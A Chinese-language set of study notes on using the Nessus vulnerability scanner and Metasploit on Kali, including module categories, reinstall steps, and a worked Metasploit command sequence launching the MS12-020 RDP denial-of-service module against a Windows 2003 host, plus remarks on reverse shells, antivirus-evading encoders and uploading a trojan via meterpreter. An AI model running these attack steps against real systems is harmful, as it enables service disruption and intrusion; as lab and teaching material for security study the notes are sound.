admin管理员组文章数量:1637699
- 系统扫描器nessus 的使用:
- 主机发现(涵盖了nmap的功能)
- 基本网络扫描(涵盖了web和漏洞的扫描)
- 认证补丁扫描(操作系统扫描)
- ping命令基于ICMP协议
- 天境包含漏洞库 可以工具扫描出来的漏洞进行比对
- MSF的使用:
- 扫描出系统漏洞之后使用MSF漏洞利用框架进行验证,kali最强大的就是MSF,windows远程桌面命令:mstsc,Kali:rdesktop
- smb是共享文件的服务 ,modules/exploits/windows/smb,rdb是远程桌面连接服务
- Listener(监听器) post攻击脚本 encoders编码加密,主要做免杀 nops绕过防火墙 evasion 规避
- moudle(模块:7大模块 /usr/share/metasploit-framework)
-
auxiliary:包含辅助脚本,包括扫描、嗅探、破解、注入、漏洞挖掘等 encoders:各种编码工具,用于躲过入侵检测和过滤系统 exploits:包含传说中各种exp、0day、漏洞利用脚本,主要攻击代码 nops:绕过防火墙 payloads:攻击载荷,攻击者发送给系统执行的指令(不包含exploits攻击阶段),payloads主要是在目标机执行的,而exploits是在本地机执行作用于目标机 post:目标机发送的一些功能性指令比如:提权,获取hash等。
-
- 更新MSF,更新kali源(配置Kali官方源为中科大的源)
-
1.vim /etc/apt/sources.list 2.注释掉官方源,加入以下中科大源,保存退出 deb http://mirrors.ustc.edu/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu/kali kali-rolling main non-free contrib 3.执行 apt update 4.下载kali数字签名:wget archive.kali/archive-key.asc 5.安装数字签名:apt-key add archive-key.asc 6.卸载msf:apt remove metasploit-framework 7.安装msf:apt-get update| apt-get install metasploit-framework 8.启动msf自带数据库:systemctl start postgresql 允许开机自启动:systemctl enable postgresql 9.构建数据库缓存:msfdb init 10.启动msf:msfconsole
-
- Nessus扫描win2003及漏洞利用:
- MS12-020漏洞利用:
-
msfconsole 进入msf控制台 search ms12-020 搜索漏洞 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS ip(win2003) exploit
- set payload/windos 设置windows攻击木马
- bind_tcp 正向连接
- reverse_tcp 反向连接 | 服务器连接客户机(方便穿墙)
-
##meterpreter后期攻击使用方法: 侵入主机从kali上传木马到受害者主机 upload 上传文件 (pcshare工具使用) ex
版权声明:本文标题:Nessus扫描系统漏洞及MSF初级 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729254477a1192517.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论